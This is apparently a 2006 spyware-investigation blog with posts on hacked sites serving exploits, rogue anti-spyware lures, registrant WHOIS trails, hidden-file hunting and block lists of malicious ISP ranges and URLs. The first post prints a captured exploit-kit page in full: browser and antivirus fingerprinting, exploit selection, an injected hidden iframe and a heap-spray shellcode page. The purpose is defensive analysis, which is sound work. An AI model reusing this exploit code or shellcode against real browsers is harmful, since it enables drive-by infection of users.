Spyware Investigations

Malicious site? or hacked site?

2006-04-17T10:40:00.000-07:00

At-risk user behavior, or innocent user behavior?

2hjb.net downloads ms0311.jar, which includes Installer.class, which includes an exploit of the vulnerability addressed by the Micorosft Java Virtual Machine security update security bulletin MS03-011.

www.2hjb.net/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.2hjb.net/ie0604.htm
www.2hjb.net/cgi-bin/ie0604.cgi?bug=MS03-11&SP1

2hjb.net had been registered the day before. It is apparently a Lithuanian
job placement company. Owned by Robin Lee of Emeryville, CA? This sounds
suspicious.

Similarly, lauritoandlaurito.com and telecarrier.es deliver ms0311.jar.

lauritoandlaurito.com/ms0311.jar (Installer.class) JAVA_BYTEVER.BE

Laurito & Laurito, LLC (Law firm specializing in foreclosures in Ohio.
Also one of Ohio's top real estate firms. Go figure.)

www.telecarrier.es/ms0311.jar (Installer.class) JAVA_BYTEVER.BE
www.telecarrier.es/ms0311.jar (TakePrivileges.class) JAVA_BYTEVER.BE
www.telecarrier.es/ie0604.htm
www.telecarrier.es/cgi-bin/ie0604.cgi?exploit=MS03-11

Telecarrier S.L. (Spain's telecommunications giant)

Similarly, the web site of "Performance Cycle of Colorado" (www[.]performancecycle.com) will connect to 66.36.240.109/ie0604.htm which kicks in 66.36.240.109/cgi-bin/ie0604.cgi?bug=0day&SP2 and 66.36.240.109/cgi-bin/ie0604.cgi?exploit=0day

66.36.240.109/cgi-bin/ie0604.cgi is something called "Web-Attacker Control panel". The prompt says "Please enter the password to access the statistics".

A person whose web site was similarly hacked reports that this code was added to their web page:

<iframe src='http://66.36.240.109/ie0601.htm' width=1 height=1></iframe>

It displays a page saying under construction, which then redirects to an annoying little javascript window, which locks up your browser.
I looked at the code of the 'Under Construction' page- It is as follows:

<HTML xmlns:IE>

<TITLE>Demo page</TITLE>

<HEAD>

<STYLE type='text/css'>

IE\:clientCaps {behavior:url(#default#clientcaps)}

</STYLE>

</HEAD>

<BODY onLoad="setTimeout('Run_BOF()',2000);">

<CENTER><H1>This site is under construction...</H1></CENTER>

<IFRAME name="StatPage" width=5 height=5 style="display:none"></IFRAME>

<IFRAME name="PageContainer" width=5 height=5 style="display:none"></IFRAME>

<DIV id="ObjectContainer"></DIV>

<IE:clientCaps ID="oClientCaps" />

<script type="text/javascript" language="JavaScript">

var ExploitNumber=0;

function GetVersion(CLSID)

{

if (oClientCaps.isComponentInstalled(CLSID,"Component ID"))

{return oClientCaps.getComponentVersion(CLSID,"ComponentID ").split(",");}

else

{return Array(0,0,0,0);}

}

function Get_Win_Version(IE_vers)

{

if (IE_vers.indexOf('Windows 95') != -1) return "95"

else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"

else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"

else if (IE_vers.indexOf('Windows 98') != -1) return "98"

else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"

else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"

else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"

}

function Run_BOF()

{

if (ExploitNumber==4)

{

self.focus();

for (i=1 ; i <=4 ; i++)

{

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="pluginst.htm"></iframe>');

}

document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="ie0601d.htm"></iframe>');

}

}

var CGI_Script="http://66.36.240.109/cgi-bin/ie0601.cgi";

if (navigator.appName=="Microsoft Internet Explorer")

{

Click_Request=CGI_Script+"?click";

var InetPath=document.location.href;

j=InetPath.lastIndexOf('/');

InetPath=InetPath.slice(0,j);

var IEversion=navigator.appVersion;

var IEplatform=navigator.platform;

if (IEplatform.search("Win32") != -1)

{

var WinOS=Get_Win_Version(IEversion);

FullVersion=clientInformation.appMinorVersion;

PatchList=FullVersion.split(";");

for (var i=0; i < PatchList.length; i++)

{

ServicePack=PatchList[i];

j=ServicePack.indexOf('SP');

if (j != -1)

{

ServicePack=ServicePack.substr(j);

Click_Request=Click_Request+'&'+ServicePack;

}

}

StatPage.location=Click_Request;

var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");

fNortonAV=0; fMcAfee=0; XP_SP2_patched=0;

try

{

var oNortonAV=new ActiveXObject("NAVCfgWizDll.NAVCfgWizMgr"); //Norton Antivirus Config Wizard initialization

fNortonAV=1;

}

catch(e){}

try

{

var oMcAfee=new ActiveXObject("McGDMgr.DwnldGroupMgr"); // McAfee Security Download Control initialization

fMcAfee=1;

}

catch(e){}

switch (WinOS)

{

case "2K":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=2; }

}

break;

case "2K3":

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

break;

case "XP":

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else // if JVM = 5.0.3810.0 or higher

{

for (var i=0; i < PatchList.length; i++)

{

if (PatchList[i]=="SP2")

{ XP_SP2_patched=1; }

}

if (XP_SP2_patched==0)

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=3; }

else

{ ExploitNumber=4; }

}

else

{

if ((fNortonAV==0)&&(fMcAfee==0))

{ ExploitNumber=5; }

else

{ ExploitNumber=4; }

}

}

break;

default:

if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))

{ ExploitNumber=1; }

else

{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher

break;

}

// launching exploit which number is depends on Windows and IE versions

switch (ExploitNumber)

{

case 1:

Trojan_Path=CGI_Script+"?exploit=MS03-11";

ObjectContainer.innerHTML='<applet archive="'+InetPath+'/'+'ie0601a.jar" codebase="'+InetPath+'" code="TakePrivileges.class" width=1 height=1><param name="ModulePath" value="'+Trojan_Path+'"></applet>';

break;

case 2:

CHM_base='//ie0601b.chm'+'::'+'/main.htm';

Protocol=unescape("%6ds-i%74s:%6dh%74%6dl:");

Init_String=Protocol+'file://'+'C:\\MAIN.MHT!'+InetPath+CHM_base;

oMSITS=document.createElement("<OBJECT data='"+Init_String+"' type='text/x-scriptlet'></OBJECT>");

document.body.appendChild(oMSITS);

document.title="Loaded !";

break;

case 3:

window.open("ie0601c.htm","Info","left=2000,top=20 00,screenX=2000,screenY=2000,width=50,height=50,sc rollbars=1,menubar=0,titlebar=0,toolbar=0,status=0 ");

self.focus();

break;

case 4:

;setTimeout('Run_BOF()',2000);

break;

case 5:

PageContainer.location="ie0601e.wmf";

break;

default:

break;

}

}

}

else if (navigator.appName=="Netscape")

{

StatPage.location=CGI_Script+"?click";

if (navigator.userAgent.indexOf('Firefox') != -1)

{

PageContainer.location="mfsa0601.htm";

}

}

else

{

StatPage.location=CGI_Script+"?click";

}

</script>

</BODY>

</HTML>

The page it redirects to (for me, anyhow) has code as follows:

<HTML><HEAD><SCRIPT language="javascript">

function SpreadShellCode() {

var i = 0;

var eip = "";

var mem_block = "";

for (i=1 ; i <=500 ; i++)

{eip = eip + unescape("%u7030")+unescape("%u4300");}

var init_shellcode = "";

var main_shellcode = "";

var full_shellcode = "";

for (i=1 ; i<=200; i++)

{mem_block = mem_block + eip;}

init_shellcode=unescape("%u9090%u9090%u9090%u42ba% u4241%u8141%u11f2%u1111%u4111%u1139%ufb75%uf18b%uf 88b%u3357%u66c9%u25b9%ufc01%ua4f3%uff5f%u90e7");

main_shellcode=unescape("%u5053%u5053%u3390%u33c0% uebc9%u5e12%ub966%u0103%ufe8b%u2e80%u8005%u0336%ue 246%uebf7%ue805%uffe9%uffff%u5ced%u7b8d%u8d44%u327 c%u0580%u5afb%u7a8d%u0528%u35fb%u4fcf%ub347%udd35% u113a%u1cc2%u4030%u7cf6%uc710%u13cd%ude05%ued48%u3 df1%u7be1%u62e9%u628d%u052c%u6ae3%u148d%u8d4d%u246 2%ue305%u0c8d%u058d%uc5cb%u565b%u5354%u5251%u4c32% u5454%u4508%u643e%u3279%u806b%u086b%uc835%u056c%u3 848%u1480%u488d%u8d14%u2478%u8db3%u1048%u0fed%u488 d%u933c%u8448%u488d%u9b44%u92c1%u1252%uf0f4%u018c% u0101%uf485%u850c%u2c34%u0144%u9bd8%uc158%u1e3a%u7 831%u71f0%u0101%u8d01%u2c5c%u9304%ube56%udd35%u555 5%ued56%u552c%ud801%uc163%u02a0%u128e%u55f0%u0101% u8501%u0cf4%u3485%u662c%ud801%u82c1%ue6e0%uf075%u0 148%u0101%u0156%uf0d8%u01d9%u0101%u7c70%u787c%u313 e%u3a31%u323a%u3a35%u3632%u383c%u3732%u3f38%u6531% u6f69%u6633%u726f%u6f31%u386b%u383a%u3237%u6965%u4 16f%u806b%u7478%u6f71%u437c%u5553%u3b38%u3833%u3c3 b%u0008");

full_shellcode = init_shellcode+main_shellcode;

mem_block = mem_block+full_shellcode;

prompt(mem_block,"Javascript initialized");

}

</SCRIPT></HEAD>

<BODY onload="setTimeout('SpreadShellCode()',2000)"></BODY></HTML>

These web sites were probably poisoned.

How spyware gets installed (2)

2006-02-25T15:20:00.000-08:00

Misspell "pot roast" as "poy roast" when searching for pot roast recipes. Notice that the web sites returned were designed to match misspelled words.

If you are unfortunate enough to select pot-roast-recipes.ioust.behavest.net, you find yourself trapped in a loop that tries to install software from WinSoftware Corporation, Inc.

WHOIS behavest.net


Andreas Tores        andreas@winouxis.com
Direccion General de Areas Protegidas
Km 12.5 Carretera Norte Moduna 3102
Managua, Nicaragua

behavest.net insists you install WinAntiSpyware.
WinAntiSpyware will report that you have serious system errors and insist you buy and install WinFixer.
Instead, use Task Manager to close the browser window. Do not install this particular WinAntiSpyware.

There could be a legimate WinAntiSpyware.com. The WinAntiSpyware web site agrees (in their terms and conditions) to agree to settle disputes according to the laws of Nevada. The General section of their license agreement indicates that the laws of the state of Nevada govern their agreement. There are two different "license agreement" web pages and two different "terms and conditions" web pages. The home page has links to "Terms and Conditions" and "License Information" and "Buy Now". "Buy Now" has different "Terms and Conditions" and "License Agreement" links. Other than references to Nevada, there is no reference to where WinAntiSpyware might be located.

The domain name WinAntiSpyware.com is registered using an address in Kiev.

winantivirus.com = [ 66.244.254.64 ]
winantispyware.com = [ 66.244.254.64 ]
winantiviruspro.com = [ 66.244.254.63 ]

Note: The next day pot-roast-recipes.ioust.behavest.net was not available. Instead, pot-roast-gravy.toms.frcollect.org had an equivalent effect.

WHOIS frcollect.org


Shuratani Laskari
1859/14 Salcedo Street
Legaspi Village Makati City
Manila
Phillipines

Registration information created a few days earlier and updated that day.

On March 3 the equivalent URL was cooking-pot-roast.buseon.seenfussy.com.

WHOIS seenfussy.com


Andreas Tores        (andreas@winouxis.com)
Direccion General de Areas Protegidas
Km 12.5 Carretera Norte, Moduna # 3102
Managua
,3289
NI
Tel. +505.2331279

Registration was created 27-Feb-2006.

See also: Symantec description of WinAntiSpyware

Block traffmoney.biz, traffnew.biz, traffbest.biz, traffweb.biz, traffdollars.biz, traffsale1.biz, traffbucks.biz & traffcool.biz

2006-02-23T18:58:00.000-08:00

traffmoney.biz, traffnew.biz, traffbest.biz, traffweb.biz, traffdollars.biz, traffsale1.biz, traffbucks.biz and traffcool.biz deliver threats. All three web sites are at one address: 85.249.23.119



traffmoney.biz/dl/fillmemadv640.htm (JS_ONLOADXPLT.G)
traffmoney.biz/dl/java.jar (JAVA_BYTEVER.S inNewSecurityClassLoader.class & JAVA_BYTEVER.S inNewURLClassLoader.class)
traffmoney.biz/dl/bag.htm
traffmoney.biz/dl/loaderadv640.jar (JAVA_BYTEVER.A in Dummy.class)
traffmoney.biz/dl/adv640.php

traffnew.biz/dl/java.jar (JAVA_BYTEVER.S inNewSecurityClassLoader.class & JAVA_BYTEVER.S in NewURLClassLoader.class)
traffnew.biz/dl/bag.htm
traffnew.biz/dl/loaderadv640.jar (JAVA_BYTEVER.A in Dummy.class)
traffnew.biz/dl/adv640.php

traffbest.biz/dl/adv438.php (JS_AGENT.BXY)
traffbest.biz/dl/fillmemadv438.htm (JS_ONLOADXPLT.G)
traffbest.biz/dl/bag.htm (JS_ONLOADXPLT.A)
traffbest.biz/dl/loaderadv438.jar (JAVA_SHINWOW.E in Matrix.class)
traffbest.biz/dl/bag.htm JS_ONLOADXPLT.A
traffbest.biz/dl/fillmemadv428.htm JS_ONLOADXPLT.G
traffbest.biz/dl/loaderadv428.jar
traffbest.biz/dl/adv428.php
traffbest.biz/dl/java.jar (NewURLClassLoader.class) JAVA_BYTEVER.S

traffweb.biz/dl/fillmemadv774.htm (JS_ONLOADXPLT.G)
traffweb.biz/dl/loaderadv774.jar
traffweb.biz/dl/GetAccess.class
traffweb.biz/dl/adv799.php
traffweb.biz/dl/java.jar
traffweb.biz/dl/bag.htm
traffweb.biz/dl/Counter.class
traffweb.biz/dl/adv774.php
traffweb.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S (NewURLClassLoader.class) JAVA_BYTEVER.S
traffweb.biz/dl/fillmemadv798.htm JS_ONLOADXPLT.G
traffweb.biz/dl/loaderadv798.jar (Dummy.class) JAVA_BYTEVER.A
traffweb.biz/dl/adv798.php
traffweb.biz/dl/bag.htm JS_ONLOADXPLT.A
traffweb.biz/dl/adv764.php
traffweb.biz/dl/loaderadv764.jar (JAVA_BYTEVER.A)
traffweb.biz/dl/fillmemadv764.htm (JS_ONLOADXPLT.G)
traffweb.biz/dl/adv799.php

traffdollars.biz/dl/fillmemadv598.htm JS_ONLOADXPLT.G
traffdollars.biz/dl/loaderadv598.jar (Dummy.class) JAVA_BYTEVER.A
traffdollars.biz/dl/bag.htm JS_ONLOADXPLT.A
traffdollars.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S (NewURLClassLoader.class) JAVA_BYTEVER.S
traffdollars.biz/dl/adv598.php

traffcool.biz/dl/fillmemadv542.htm JS_ONLOADXPLT.G
traffcool.biz/dl/adv542.php
traffcool.biz/dl/loaderadv542.jar (Dummy.class) JAVA_BYTEVER.A
traffcool.biz/dl/java.jar (NewSecurityClassLoader.class) JAVA_BYTEVER.S
traffcool.biz/dl/java.jar (NewURLClassLoader.class) JAVA_BYTEVER.S
traffcool.biz/dl/bag.htm JS_ONLOADXPLT.A

"traffmoney", "traffnew" and "traffdollars" use the same IP address and the registration information.

WHOIS traffmoney.biz, traffnew.biz, traffdollars.biz?



traffmoney.biz = [ 85.249.23.119 ]
   Domain Name:                                 TRAFFMONEY.BIZ
   Domain ID:                                   D12368897-BIZ
   Sponsoring Registrar:                        TLDS INC.
   Sponsoring Registrar IANA ID:                320
   Domain Status:                               clientTransferProhibited
   Registrant ID:                               6510552-SRSPLUS
   Registrant Name:                             Jason Coffman
   Registrant Organization:                     Private person
   Registrant Address1:                         908 Alder St
   Registrant City:                             Philadelphia
   Registrant State/Province:                   PA
   Registrant Postal Code:                      19147
   Registrant Country:                          United States
   Registrant Country Code:                     US
   Registrant Phone Number:                     1.74952171179
   Registrant Email:                            admin@toolbarbest.biz

WHOIS traffbest.biz [ = 85.249.23.119 = sr-customers-23-119.justdns.org]
Jason Coffman of Philadelphia, PA AKA admin@toolbarbest.biz

OK, then WHOIS toolbarbest.biz?


toolbarbest.biz = [ 85.249.23.117 ]
   Domain Name:                                 TOOLBARBEST.BIZ
   Domain ID:                                   D11890133-BIZ
   Sponsoring Registrar:                        TLDS INC.
   Sponsoring Registrar IANA ID:                320
   Domain Status:                               clientTransferProhibited
   Registrant ID:                               6488994-SRSPLUS
   Registrant Name:                             Alexander Pushkin
   Registrant Organization:                     Home Home
   Registrant Address1:                         Pushkina str. - 1 - 1
   Registrant City:                             Moscow
   Registrant Postal Code:                      123456
   Registrant Country:                          Russian Federation
   Registrant Country Code:                     RU
   Registrant Phone Number:                     78.462788201
   Registrant Email:                            admin@newtoolbar.biz

Literary giant Alexander Sergeevich Pushkin (1799-1837)? I wonder if Jason Coffman is a real person, and if he has registered any other domain names?

WHOIS newtoolbar.biz? (Ezhi Brozkevitsh Warszawa, Polandadmin@buytraff.biz)
WHOIS buytraff.biz (Ezhi Brozkevitsh Warszawa,Poland darkgt@mail.ru)
There that trail ends.

Reverse name resolution of 85.249.23.119 shows it belongs to Sergey Shishkin of Sergedjus Vlasovas in Klaipeda LT (Lithuania) sergedjus@eexhost.com

How spyware gets installed

2006-02-18T08:50:00.000-08:00

Search (using, for example, Google) for "midi file." One of the suggested destinations is musicrobot.com.

To make some money, musicrobot works with "advertising networks." Note, for example, the Google ads down the right side.

The banner at the top is a Macromedia Flash presentation from the advertising network FASTCLICK.COM.

When the musicrobot home page was opened, a pop-under ad window was also opened.

The pop-under ad is also a Macromedia Flash presentation from the advertising network FASTCLICK.COM.

(Note: Whenever you encounter an ad like this, always close the window using the "X" in the upper right-hand corner.)

FASTCLICK.COM provided to musicrobot the following HTML code to include on their web page:



[!-- FASTCLICK.COM POP-UNDER CODE v1.8 for musicrobot.com (12 hour) --]
[script language="javascript"][!--              
var dc=document; var date_ob=new Date();
dc.cookie='h2=o; path=/;';var bust=date_ob.getSeconds();
if(dc.cookie.indexOf('e=llo') [= 0 && dc.cookie.indexOf('2=o') ] 0){
dc.write('[scr'+'ipt language="javascript" src="http://media.fastclick.net');
dc.write('/w/pop.cgi?sid=2924&m=2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;tp=2&v=1.8&c='+bust+'"][/scr'+'ipt]');
date_ob.setTime(date_ob.getTime()+43200000);
dc.cookie='he=llo; path=/; expires='+ date_ob.toGMTString();} // --]
[/script]                                       
[!-- FASTCLICK.COM POP-UNDER CODE v1.8 for musicrobot.com --]

[/head]
[body bgcolor="#FFFFFF" text="#000000" onload="document.forms[0].terms.focus()"]
[center]
[center]
[!-- FASTCLICK.COM 728x90 and 468x60 BANNER CODE for musicrobot.com --]
[script language="javascript" src="http://media.fastclick.net/w/get.media?sid=2924&m=1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;tp=5&d=j&t=n"][/script]
[noscript][a href="http://media.fastclick.net/w/click.here?sid=2924&m=1&c=1" target="_blank"]
[img src="http://media.fastclick.net/w/get.media?sid=2924&m=1&tp=5&d=s&c=1"
width=728 height=90 border=1][/a][/noscript]
[!-- FASTCLICK.COM 728x90 and 468x60 BANNER CODE for musicrobot.com --]
[/center][br]

All you need to recognize is that musicrobot.com is running javascript that links you to fastclick.com.

If you use musicrobot to search for "we will rock you", the among the results is a link to http://www.geocities.com/SouthBeach/Strand/2372/soundmidi.html. By itself, this web site is harmless.
The actual link from musicrobot.com is of the form http://media.fastclick.net/w/get.media?sid=2924&m=5&url=http%3A//www.geocities.com/SouthBeach/Strand/2372/soundmidi.html

That is, you are sent to media.fastclick.net first, where you are confronted with an offer from cdn.fastclick.net, the same source as the earlier pop-under ad. The fastclick.net ad is usually for smileys, ecards, cursors, screensavers or some other thing cute and not obviously malicious.

If you accept the offer, you are asked if you want to install this software. Carefully review what you are accepting. The terms will insist that the software does not gather any personally identifiable information. The terms will also say that the software gathers your IP address. You should know that the IP address is used to identify you and your habits. Carefully consider whether you consider this to be personal identification.

Hide, Go Seek

2006-01-24T15:41:00.000-08:00

Where could I find hidden files?

There's the "hidden" attribute. The hidden attribute can be set on directories, not just files.
The "hide in plan sight" strategy is at least as old as Poe's "The Purloined Letter." Its longevity reflects its effectiveness. Finding files that don't belong amongst the hundreds of files that do is a challenge. Using a utility to find unsigned executables and confirming that the signatures that are found are authenticate will produce a long list that includes many benign conditions. See sigcheck from Sysinternals. (sigcheck -s -v c:\ >result.csv)
Suspect recent files in C:\Winnt\System32 (or C:\Windows\System32). The date stamp is rarely modified. Similarly, suspect recent files in C:\Winnt (or C:\Windows) and in the user's temporary files (C:\Documents and Settings\\Local Settings\Temp).
Hide in a system folder, such as "C:\Windows\Downloaded Program Files" (or "C:\Winnt\Downloaded Program Files"). There's a real folder of that name, but you won't see its contents when you're using Windows Explorer. Use a command window instead. Expect hidden, system files and search subdirectories. (dir "C:\Winnt\Downloaded Program Files" /ah /s) (dir "C:\Winnt\Downloaded Program Files" /s)
Hide using the Directory and System attributes. Foundstone's hfind utility hunts for files with the hidden attribute, directories with the hidden attribute and directories with the system attribute. There are a lot of hidden files and folders, a lot of benevolent conditions. (hfind \\remote\c$ >> remote.txt)
Hide behind other files, using Alternate Data Streams (ADS). Foundstone's sfind utility searches for just the streams. (Windows Explorer caches thumbnails using ADS. XP SP2 attaches a "Zone.Identifier" tag to downloaded files using ADS. These are benign uses.) There's also an LADS utility that can search for ADS on the network. The Sysinternals streams utility can also be used to search for Alternate Data Streams. (streams -s *.* to find ADS, streams -s -d *.jpg to delete the cached thumbnails).
Sysinternals' Rootkit Revealer is time consuming and reports some benevolent conditions. When used in conjunction with psexec, it can scan remote systems. (psexec \\remote -c rootkitrevealer.exe -a c:\windows\system32\rootkit.log)
Stegdetect (stegdetect *.jpg) can be used to find steganographic content (hidden information) in JPEG images.

Block access to InterCage and Inhoster

2006-01-21T15:22:00.000-08:00

InterCage Inc.: 69.50.160.0/19 (69.50.160.0 - 69.50.191.255)
Inhoster: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255)

Use your firewall to block access. If you have no firewall, use route commands to divert traffic. Sample route commands (appropriate for some Windows users):
route -p add 69.50.160.0 mask 255.255.224.0 192.168.100.51
route -p add 85.255.112.0 mask 255.255.240.0 192.168.100.51

When the route command is successful there is no response. "192.168.100.51" is an arbitrarily selected and unused IP address on the local network. "192.168.0.51" or "192.168.1.51" may be more appropriate choices, depending upon the local network configuration. The "-p" (persistent) option is not available in Windows 95 or 98.

Why? InterCage and Inhoster are Internet Service Providers (ISPs) who permit malicious web activity. A SANS handler diary entry mentions this. ZDNet malware blog. Search Google Groups for either name. Search for an individual IP address using Google. One frightening malicious activity is the substitution of their name servers for the name servers supplied by the user's ISP's name servers.

Further information about browser attacks:
http://www.mnin.org/

Further information about routing:
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/route.mspx
http://spam.abuse.net/adminhelp/ip.shtml
http://www.linuxgazette.com/issue36/tag/a.html
http://www.hackfaq.org/null-route.shtml

Handy "netmask calculators"
http://jodies.de/ipcalc
http://www.csc.fi/english/funet/calc/laskin2.html

Handy network utilities, including a reverse IP lookup
domaintools.com

Inhoster IP addresses known to have been involved in malicious activities:

85.255.112.5	Name server
85.255.112.6	Name server
85.255.112.7	Name server
85.255.112.10	Name server
85.255.112.11	Name server
85.255.112.103	Name server
85.255.112.116	Name server
85.255.112.119	Name server
85.255.112.120	Name server
85.255.112.182	Name server
85.255.112.200	Name server
85.255.113.10/?to=nan82&from=in
85.255.113.10/?to=zonder&from=in
85.255.113.22/inc/nan82.html	HTML_MHTREDIR.A
85.255.113.22/inc/trove.html
85.255.113.100	Name server
85.255.113.101	Name server
85.255.113.134	Name server
85.255.113.142	Name server
85.255.113.149	Name server
85.255.113.170/345/count3.gif	Backdoor.Sdbot.gen
85.255.113.174/w/adult.wmf	malicious WMF file
85.255.113.212/5/s1s/image.gif
85.255.113.212/5/wind/index.htm	distributes various exploits
85.255.113.212/5/i3.php	distributes various exploits
85.255.113.212/5/sl/payload.ani	Trojan-Downloader.Win32.Ani.b
85.255.113.212/5/s2t/tes.exe	Trojan-Downloader.Win32.Zlob.cc
85.255.113.242/adv/057/count.jar	Exploit.Java.ByteVerify
85.255.114.54	Name server
85.255.114.89	Name server
85.255.114.99	Name server
85.255.114.195	Name server
85.255.115.3	Name server
85.255.115.45	Name server
85.255.115.53	Name server
85.255.115.75	Name server
85.255.115.98	Name server
85.255.115.108	Name server
85.255.115.154	Name server
85.255.115.171/bt/7/wmf/wmf_dcode.wmf	malicious WMF file
85.255.115.171/pa/4/inp.php
85.255.115.174 updatesecurity.com	rogue anti-spyware application
85.255.115.226/1/gdnUS1402.exe	SpyAxe rogue anti-spyware application
85.255.115.227/1/gdnUS1402.exe	SpyAxe rogue anti-spyware application

85.255.115.227 is also 2awm.com, 2youx.net, awmgate.com, awmnet.com, check-wire.com, find-by-web.com, lab-wire.com, lipdolls.net, netvoine.biz, online-more.com, search4com, zlex.org, zllin.info, and ztrf.net

zllin.info/e/us053/e.anr	TROJ_ANICMOO.AD
zllin.info/e/us053/index1.php
zllin.info/e/us053/Anima.class
zllin.info/e/us053/jar.jar
zllin.info/e/us053/index.php
zllin.info/e/us24/e.anr	TROJ_ANICMOO.AD
zllin.info/e/us24/jar.jar
zllin.info/e/us24/Anima.class
zllin.info/e/us24/index.php
zllin.info/e/us24/index1.php
zllin.info/e/us24//main.chm	CHM_MINER.A
zllin.info/e/us26/e.anr	TROJ_ANICMOO.AD
zllin.info/e/us26/index.php
zllin.info/e/us26/index1.php
zllin.info/e/us26/index1.php
zlex.org/fr/?id=us27
zlex.org/fr/tp/?id=us27&tp=lan
zlex.org/new/us27/Anima.class
zlex.org/new/us27/zl.anr	TROJ_ANI.L
zlex.org/per/jara.jar (Gummy.class)	JAVA_BYTEVER.A-1
zlex.org/per/?ct=lan
zlex.org/per/aAnima.class
zlex.org/psg/us27/indexa.php
zlex.org/psg/us27/index.php
zlex.org/psg/us27/psg.anr	TROJ_ANI.H

85.255.115.230/1/gdnUS1402.exe	SpyAxe rogue anti-spyware application
85.255.116.29 Name server
85.255.116.43 Name server
85.255.116.149 Name server
85.255.116.212/pa/inp/inpl.php?id=pt6
85.255.116.213/pa/inp/inpl.php?id=pt4
85.255.117.38/_cnt2.htm	HTML_HTHELP.A
85.255.117.38/cnt8_secret.htm
85.255.117.38/cnt8.ani
85.255.117.38/cnt8.htm	TROJ_ANICMOO.N
85.255.117.38/cnt7_dhycnft.htm
85.255.117.38/site.htm?lng=1&trg=rc
85.255.117.50/pa/1/newe/assemble1.htm
85.255.117.50/pa/1/newe/css.wmf	EXPL_WMF.GEN
85.255.117.50/pa/1/newe/index.ani
85.255.117.50/pa/1/newe/makeit.htm
85.255.117.50/pa/1/newe/prepare.htm	JS_EXPLOIT.AC
85.255.117.50/pa/inp/i.php?id=pa1
85.255.117.51/pa/inp/newver/WkNRT3JrVXl0Sm9BQUVYMVV3RUFBQURV.wmf
EXPL_WMF.GEN
85.255.117.53/pa/inp/img/aC1QUUZVVXl0Sm9BQUdWc2xHNEFBQUZq.html	EXPL_WMF.GEN
85.255.117.53/pa/inp/img/aHA4eE5VVXl0Sm9BQUg2RWZZZ0FBQUpM.html	EXPL_WMF.GEN
85.255.117.53/pa/inp/img/akBVcGVrVXl0Sm9BQUU3eno0MEFBQUo3.wmf	EXPL_WMF.GEN
85.255.117.53/pa/inp/img/bzl6OExrVXl0Sm9BQURLRThQa0FBQUZI.wmf	EXPL_WMF.GEN
85.255.117.52/pa/inp/img/cDlHdGpFVXl0Sm9BQUIzSmV3VUFBQUJD.htm	EXPL_WMF.GEN
85.255.117.53/pa/inp/img/ZXZhVmhVVXl0Sm9BQUR1QkxQSUFBQUZx.wmf	EXPL_WMF.GEN